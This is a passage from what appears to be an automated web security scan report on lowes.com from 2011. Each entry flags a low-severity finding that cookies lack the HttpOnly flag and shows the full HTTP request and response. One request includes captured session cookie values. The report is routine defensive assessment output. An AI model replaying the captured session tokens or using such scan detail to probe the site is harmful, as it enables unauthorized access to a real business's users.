Date: Tue, 12 Jul 2011 21:32:09 GMT
Connection: close
Set-Cookie: MBJT=CT; expires=Tue, 09-Aug-2011 21:32:09 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508129~id=d732280edae397398f4298647e05dba4; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...

11.343. http://www.lowes.com/images/blank.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/images/blank.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508048~id=3127b3139b297a2c0a2d91d0ab633e19; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/blank.gif HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: http://ak1.abmr.net/is/www.lowes.com?U=/images/blank.gif&V=3-P%2fXkUX0BomDTWP2A4PNfzlC691C5HH5j9+allLRENBG7nSEOhAszDQ%3d%3d&I=2F94A1DBD58FE8F&D=lowes.com&01AD=1&
Expires: Tue, 12 Jul 2011 21:30:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:48 GMT
Connection: close
Set-Cookie: MBJT=CT-1; expires=Tue, 09-Aug-2011 21:30:48 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508048~id=3127b3139b297a2c0a2d91d0ab633e19; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

11.344. http://www.lowes.com/images/category-corner.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/images/category-corner.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/category-corner.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 08 Feb 2011 19:47:49 GMT
Accept-Ranges: bytes
Content-Length: 832
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:49 GMT
Connection: close
Set-Cookie: akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

.PNG
.
...IHDR.......(.............IDATH..W.k.A......$.ELa.....VA......[.....u*{;!X..UZ. .A.......,vgnos.........}..o....|..#j..B.".2O...L.....A.V.,...,M..i..,...8.............w.Q............8u..
...[SNIP]...

11.345. http://www.lowes.com/images/category-right-cover.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/images/category-right-cover.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/category-right-cover.gif HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 04 Nov 2010 17:03:57 GMT
Accept-Ranges: bytes
Content-Length: 151
Content-Type: image/gif
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:49 GMT
Connection: close
Set-Cookie: akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

GIF89a.......................................................!.......,..........D..Y\.8.|7.....`...q....*....x.....@.cA,....r.08...cJe8......z.2
A....;

11.346. http://www.lowes.com/images/cover.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/images/cover.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cover.gif HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 05 Nov 2010 20:13:47 GMT
Accept-Ranges: bytes
Content-Length: 866
Content-Type: image/gif
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:49 GMT
Connection: close
Set-Cookie: akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

GIF89ar...............5.................................................................................................................................................................................
...[SNIP]...

11.347. http://www.lowes.com/images/sprites/buttons.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/images/sprites/buttons.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sprites/buttons.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 14 Mar 2011 20:50:18 GMT
Accept-Ranges: bytes
Content-Length: 2555
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:32:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:08 GMT
Connection: close
Set-Cookie: MBJT=CT; expires=Tue, 09-Aug-2011 21:32:08 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTEr..Lp.....D...S.^....^...c.X...U..N......Pe.......T....:v...............i........%j.r..........,r.........c+p.'l...8.P...
...[SNIP]...

11.348. http://www.lowes.com/images/sprites/global.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/images/sprites/global.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508127~id=92c2f0688210aad23c3f6411d8cbacd8; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sprites/global.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 17 Feb 2011 15:30:09 GMT
Accept-Ranges: bytes
Content-Length: 17975
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:32:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:07 GMT
Connection: close
Set-Cookie: MBJT=CT; expires=Tue, 09-Aug-2011 21:32:07 GMT; path=/; domain=.lowes.com
Set-Cookie: akaau=1310508127~id=92c2f0688210aad23c3f6411d8cbacd8; path=/
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

.PNG
.
...IHDR.............G.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE................h..[.......-b.....Gx;{..`........Y.....y..........U...l..R....p.....Nv..X.rqr..R.RW&##.:z......"V.........
...[SNIP]...

11.349. http://www.lowes.com/pc_Flooring_4294934373_4294937087_ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/pc_Flooring_4294934373_4294937087_

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

catSearchResult=|/pl_Flooring_4294934373_4294937087_; Path=/
TSdcd8fd=7907db042a2a9db2b27b1ceb1986c74b691d48a17df081e44e1cbbd2; Path=/
TSdcd8fd=11f75cf6ef221eee9be8eb664312c9d98f23ec9430417adf4e1cbbd2; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pc_Flooring_4294934373_4294937087_?cm_sp=Flooring-_-Home|A2R2-_-Merch|Flooring_Event_Page_Shop&cm_cr=Homepage+1.2-_-Web+Activity-_-Homepage+A2+Activity+7.12.11-_-HomePage_Area2-_-132107_3_Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/?mastheadURL=TopCategoriesDisplayView&firstReferURL=http%3A%2F%2Fwww.lowes.com%2F&qvRedirect=&langId=-1&findStoreErrorURL=StoreLocatorDisplayView&catalogId=10051&masthead=true&zipCode=10010&Ntt=&NttParam=&storeId=10151&selectedLocalStoreBeanArray=%5Bcom.lowes.commerce.storelocator.beans.LocatorStoreBean%404e575949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e75d949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%404e955949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d749949%2C+com.lowes.commerce.storelocator.beans.LocatorStoreBean%403d941949%5D&URL=TopCategoriesDisplayView&y=0&isQvSearch=&x=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmTPSet=Y; MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; JSESSIONID=0000PEQyadqdrfGWIRAteqY0oby:14e1grfqa; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TseYfU77Cle%2fm%0ab0yPR1ZdZKqdzv4K90EN5LABrTDJqw%2bv3BQL%2fdgBlrAW4pfUJIrUfYSaLoZuCgSo0qJaRQKNfA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2896981527%3atrue%3afalse%3a0%3aWsNL%2fRHH6YRulRJGHQvbU%2bbK20A%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; cmSessionDepth=2; lowes-prefs={"zipin":{"show":false}}; stop_mobi=yes; TSdcd8fd=9bfed736835c96972761a89519e0d94422df7bb2eaf0e7a04e1cbbb4; cmRS=&t1=1310506254730&t2=1310506258515&t3=1310506282771&lti=1310506282770&ln=Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop&hr=/pc_Flooring_4294934373_4294937087_%3Fcm_sp%3DFlooring-_-Home%7CA2R2-_-Merch%7CFlooring_Event_Page_Shop%26cm_cr%3DHomepage+1.2-_-Web+Activity-_-Homepage+A2+Activity+7.12.11-_-HomePage_Area2-_-132107_3_Flooring-Home-A2R2-Merch-Flooring_Event_Page_Shop&fti=&fn=storeSearchForm%3A0%3BstoreUpdateForm%3A1%3BsearchNearestStoresForm%3A2%3BfrmQuickSearch%3A3%3B&ac=&fd=&uer=&fu=&pi=HOME&ho=www7.lowes.com/eluminate%3F&ci=90226018

Response

11.350. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/global-min.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/global/global-min.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508047~id=555ff81eba66b18e3e9e19529b94c6db; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/global/global-min.css HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 04 Jul 2011 11:47:39 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 64997
Expires: Tue, 12 Jul 2011 21:30:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508047~id=555ff81eba66b18e3e9e19529b94c6db; path=/

body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td,button{margin:0;padding:0;}table{border-collapse:collapse;border-spacing:0;}fieldset,img{border:0;}addr
...[SNIP]...

11.351. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/ie/ie-min.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/global/ie/ie-min.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508126~id=05cb77e7a9af330269ff0b0aee88568a; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/global/ie/ie-min.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 25 May 2011 16:49:26 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 388
Expires: Tue, 12 Jul 2011 21:32:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508126~id=05cb77e7a9af330269ff0b0aee88568a; path=/

button{overflow:visible;width:auto;}button span{margin-top:0;}#globalMenu .corner{BEHAVIOR:url(/javascript/pngfix/iepngfix.htc);}#find_a_store_btn span{top:0;}#salutation a{display:inline-block;margin
...[SNIP]...

11.352. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/homepage-min.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/homepage-min.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508048~id=3127b3139b297a2c0a2d91d0ab633e19; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/homepage/homepage-min.css HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 12 Jul 2011 12:58:27 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 7146
Expires: Tue, 12 Jul 2011 21:30:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:48 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508048~id=3127b3139b297a2c0a2d91d0ab633e19; path=/

#shipping_banner_noshow{display:none;}.box_shadow{border:1px solid #fff;-moz-box-shadow:0 1px 5px 1px rgba(170,174,178,0.5);-webkit-box-shadow:0 1px 5px 1px rgba(170,174,178,0.5);box-shadow:0 1px 5px
...[SNIP]...

11.353. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/ie/ie-min.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/ie/ie-min.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TSdcd8fd=9b6c9bca400d19845a5f1686ecf59d31ef92e2b5d95d32f64e1cbbac; Path=/
akaau=1310508127~id=92c2f0688210aad23c3f6411d8cbacd8; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/homepage/ie/ie-min.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 29 Jun 2011 02:52:49 GMT
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/css
Date: Tue, 12 Jul 2011 21:32:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TSdcd8fd=9b6c9bca400d19845a5f1686ecf59d31ef92e2b5d95d32f64e1cbbac; Path=/
Set-Cookie: akaau=1310508127~id=92c2f0688210aad23c3f6411d8cbacd8; path=/

11.354. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-1.0.5.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-1.0.5.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508130~id=1c4ed4773ab2b33abb47cb68f3f868cd; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/ie6-1.0.5.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com
Cookie: MBJT=CT

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 06 Jul 2010 21:47:25 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 7693
Expires: Tue, 12 Jul 2011 21:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508130~id=1c4ed4773ab2b33abb47cb68f3f868cd; path=/

/* last modified 02/12/10 by j. Johnson */

/* masthead fixes */
*html ul#global-nav li.menu-search input.text {width:205px;}
#masthead #store-locator label {width:460px !important;}
#masthead #
...[SNIP]...

11.355. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508130~id=1c4ed4773ab2b33abb47cb68f3f868cd; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/ie6-print.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com
Cookie: MBJT=CT

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 09 Sep 2010 18:32:21 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3125
Expires: Tue, 12 Jul 2011 21:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508130~id=1c4ed4773ab2b33abb47cb68f3f868cd; path=/

@charset "UTF-8";
/* Last Modified On: 02/08/2010 by RA */

/* 13200
#help-masthead {display:none !important;}*/

/* 12891
#my-store-info {display:none !important;} */

#store-loc {width:10
...[SNIP]...

11.356. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/ie6.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508127~id=92c2f0688210aad23c3f6411d8cbacd8; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/ie6.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 24 Jan 2011 22:18:29 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 21646
Expires: Tue, 12 Jul 2011 21:32:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508127~id=92c2f0688210aad23c3f6411d8cbacd8; path=/

/* Last Modified 12/13/10 JM */

* html #hero img, * html #homepage-departments img, #globalMenu .corner { behavior:url(/javascript/pngfix/iepngfix.htc); }

* html #hero .category-navigation li im
...[SNIP]...

11.357. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main-1.0.5.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/main-1.0.5.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508126~id=05cb77e7a9af330269ff0b0aee88568a; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/main-1.0.5.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 14 Jun 2011 20:50:09 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 51340
Expires: Tue, 12 Jul 2011 21:32:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508126~id=05cb77e7a9af330269ff0b0aee88568a; path=/

/* 11/11/2010 MH */

#my-lowes-links {margin:0;}

#content-area-category a:link, #content-area-category a:visited { color:#004990; text-decoration:none; }
#content-area-category a:hover, #content-area
...[SNIP]...

11.358. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508126~id=05cb77e7a9af330269ff0b0aee88568a; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/main.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 05 Jul 2011 17:15:57 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 238055
Expires: Tue, 12 Jul 2011 21:32:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:32:06 GMT
Connection: close
Vary: Accept-Encoding
